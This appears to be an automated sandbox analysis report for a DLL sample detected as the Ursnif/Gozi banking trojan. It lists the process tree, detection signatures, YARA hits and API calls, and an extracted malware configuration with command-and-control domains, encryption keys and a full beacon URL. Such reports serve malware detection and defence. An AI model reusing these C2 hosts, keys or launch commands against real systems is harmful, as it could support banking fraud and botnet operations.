Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com..7135.20767

Overview

General Information

Sample Name:SecuriteInfo.com..7135.20767 (renamed file extension from 20767 to dll)
Analysis ID:432910
MD5:5ba7ac7fa4f9e831679832b6cc22aee8
SHA1:813df24ac22c2666b28bc3e7fb9bd1eef2a7f395
SHA256:d2c19ac3eace29239bf919c442556abf782da5953325ee6b2626482fbf442f29
Tags:dllGozi
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4712 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6116 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5328 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 68 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4604 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 4456 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFqAvira URL Cloud: Label: malware
            Source: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpoAvira URL Cloud: Label: malware
            Found malware configurationShow sources
            Source: 00000005.00000003.323666044.0000000002AB0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: authd.feronok.comVirustotal: Detection: 11%Perma Link
            Source: SecuriteInfo.com..7135.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: SecuriteInfo.com..7135.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll
            Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
            Source: global trafficHTTP traffic detected: GET /INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq39/C9yL3XEqjGdzvV/F4wrCEliEtubK_2BQN3v0/mpD0sYBWj1_2BOoZ/MhYNZMroasOcyRm/Y7cgiiYGTmIYClS1bt/R_2BrGpes/V0WKbm6yczDyoBvOW06Z/_2FVUJ_2BtBEMJQ2mZ0/eqMRxCIXxJwUIjVA7qTLlE/f_2FwC5tmUPbh/r76jmp6x/obp7g2x_2BpjxmD9q5fMhKl/Y1cOMUM_2F/x9ahGBENuH7csdR7_/2FySnpeWZizz/XD203nXIqoX/COsoX4qlT56/jcBfJkpo HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: authd.feronok.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 20:50:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {FA4B99A6-CA78-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF80E1CCC67DA5CD93.TMP.23.drString found in binary or memory: http://authd.feronok.com/INsgiuDpuLw85PPWCNwmsmw/LyIcaMF9BW/RDuesN3193oziv6jZ/21yngUSJZxlB/5U99_2BFq

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
            Source: loaddll32.exe, 00000000.00000002.460078435.000000000073B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY

            System Summary:

            barindex
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C2485 NtQueryVirtualMemory,0_2_6E1C2485
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C1B9C GetProcAddress,NtCreateSection,memset,4_2_6E1C1B9C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C1EC7 NtMapViewOfSection,4_2_6E1C1EC7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C2485 NtQueryVirtualMemory,4_2_6E1C2485
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C22640_2_6E1C2264
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2237EA0_2_6E2237EA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23F1F00_2_6E23F1F0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23D7C50_2_6E23D7C5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23DFD20_2_6E23DFD2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2245100_2_6E224510
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E291D400_2_6E291D40
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2372000_2_6E237200
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E23A2160_2_6E23A216
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2210100_2_6E221010
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2308E50_2_6E2308E5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E22A9D30_2_6E22A9D3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C22644_2_6E1C2264
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2237EA4_2_6E2237EA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23F1F04_2_6E23F1F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23D7C54_2_6E23D7C5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23DFD24_2_6E23DFD2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2245104_2_6E224510
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E291D404_2_6E291D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2372004_2_6E237200
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E23A2164_2_6E23A216
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2210104_2_6E221010
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2308E54_2_6E2308E5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E22A9D34_2_6E22A9D3
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E220F70 appears 31 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E220F70 appears 31 times
            Source: SecuriteInfo.com..7135.dllBinary or memory string: OriginalFilenameSon.dll8 vs SecuriteInfo.com..7135.dll
            Source: SecuriteInfo.com..7135.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
            Source: classification engineClassification label: mal76.troj.winDLL@12/13@1/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF00D3A9B95DF089AC.TMPJump to behavior
            Source: SecuriteInfo.com..7135.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Paragraphbell
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,Sharptwo
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,ParagraphbellJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com..7135.dll,SharptwoJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4456 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com..7135.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: SecuriteInfo.com..7135.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: loaddll32.exe, rundll32.exe, SecuriteInfo.com..7135.dll
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress,0_2_6E1C1F7C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C2200 push ecx; ret 0_2_6E1C2209
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C2253 push ecx; ret 0_2_6E1C2263
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E220FB5 push ecx; ret 0_2_6E220FC8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D0B16 pushad ; iretd 0_2_6E1D0B17
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1CEBB5 pushfd ; iretd 0_2_6E1CEC0C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D2807 pushad ; retf 0_2_6E1D2809
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D10D4 push 04853024h; retf 0_2_6E1D10DB
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C2200 push ecx; ret 4_2_6E1C2209
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1C2253 push ecx; ret 4_2_6E1C2263
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E220FB5 push ecx; ret 4_2_6E220FC8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D0B16 pushad ; iretd 4_2_6E1D0B17
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1CEBB5 pushfd ; iretd 4_2_6E1CEC0C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D2807 pushad ; retf 4_2_6E1D2809
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E1D10D4 push 04853024h; retf 4_2_6E1D10DB

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000003.430352092.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.464198146.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430424986.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430241635.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430313705.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430450163.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430406711.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430285928.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.430372927.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5328, type: MEMORY
            Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E238402
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E238402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,0_2_6E238402
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1C1F7C LoadLibraryA,GetProcAddress,0_2_6E1C1F7C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E297188 mov eax, dword ptr fs:[00000030h]0_2_6E297188
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2970BE mov eax, dword ptr fs:[00000030h]0_2_6E2970BE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E296CC5 push dword ptr fs:[00000030h]0_2_6E296CC5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E297188 mov eax, dword ptr fs:[00000030h]4_2_6E297188
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E2970BE mov eax, dword ptr fs:[00000030h]4_2_6E2970BE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E296CC5 push dword ptr fs:[00000030h]4_2_6E296CC5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E225139 GetProcessHeap,0_2_6E225139
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E225EA1 SetUnhandledExceptionFilter,0_2_6E225EA1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E225ED2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E225EA1 SetUnhandledExceptionFilter,4_2_6E225EA1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E225ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6E225ED2
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com..7135.dll',#1Jump to behavior
            Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: loaddll32.exe, 00000000.00000002.460172900.0000000000CD0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.461520126.0000000003680000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E1C1E8A
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22E72D
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22E438
            Source: C:\Windows\System32\loaddll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,0_2_6E22E4B5
            Source: C:\Windows\System32\loaddll32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,0_2_6E22E538
            Source: C:\Windows\System32\loaddll32.exeCode function: EnumSystemLocalesW,0_2_6E22ED13
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoW,0_2_6E22ED99
            Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_6E22FA7E
            Source: C:\Windows\System32\loaddll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,0_2_6E223BC0
